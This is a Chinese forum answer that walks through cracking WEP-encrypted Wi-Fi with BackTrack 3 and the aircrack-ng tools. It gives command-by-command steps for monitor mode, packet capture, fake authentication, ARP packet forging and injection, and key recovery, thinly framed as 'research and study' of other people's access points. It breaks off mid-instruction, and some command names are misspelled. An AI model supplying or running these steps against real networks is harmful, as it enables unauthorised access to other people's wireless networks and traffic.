发布网友 发布时间:2023-09-14 06:36
共1个回答
热心网友 时间:2024-12-03 21:07
启动BT3后,加载驱动。3945网卡加载驱动是研究学习的关键。打开一个命令窗口输入modprobe –r iwl3945输入modprobe ipwraw3.查找目标:用Airoscript的扫描功能连续三次都选择1,(没有图,简单的英文)(不能在命令窗口输入,在程序里面找)。发现5个,有4个加密,data都是0,开放的那个AP有一个客户端。 我们选择第一个作为目标,channel为11。输入 airmon-ng start wifi0 11 激活网卡的Monitor模式 <说明:11是要监听的频道,这个值要与你研究学习对象的值一致.4.在正确执行1、2步后,输入抓包命令来抓包。输入命令 airomp-ng --ivs -w 12345 -c 11 wifi0 ,其中,12345是获取的ivs的保存文件的名字,11是channel值,你根据实际修改。开始监听channel 11了。5.上面窗口不关闭,另开一个窗口,输入命令,用自己的网卡连接要研究学习的ap输入aireplay-ng -1 0 -e ap的essid -a ap的mac -h 自己网卡的mac wifi0这时,系统将回显Sending Authentication RequestAuthentication successfulSending Association RequestAssociation successful :-) 这时,airomp-ng窗口的变化这时候等Data有了1万5就可新开个命令窗口,用aircrack-ng来研究学习了。研究学习结果:^_^大功告成。输入y 回车,将得到一个至关重要的xor文件。(我自己试验在输入y后,系统开始发送数据,airomp-ng窗口一下就有了反应,Data数立即增长,我就没有必要进行下面的步骤了,等Data有1万5就用aircrack-ng破出了密码。) 再输入ls 查看当前目录,你将看到刚才生成的一个后缀名为xor 的文件。 7.输入packetforge-ng -0 -a ap的mac -h 自己网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment -××××-××××.xor -w mrarp 其中,–l中的l是L的小写,别和1混淆,而其中的××××-××××.xor 是你刚才生成的文件名。系统回显:Wrote packet to: mrarp8.输入aireplay-ng -2 –r mrarp -x 1024 wifi0 ,发包攻击.其中,-x 1024 是限定发包速度,避免网卡死机,我选择的是1024。输入y 回车 攻击开始 这时,前面的抓包窗口上的data将迅速增加。 到数据增加到3万以上时,另开窗口,启动aircrack-ng -n 64 -b ap的mac name-01.ivs其中64 是64位密码,如果是128位,换成128即可。 有客户端的研究学习前面的步骤一样:输入modprobe –r iwl3945输入modprobe ipwraw现在,只要一个命令就搞定,输入: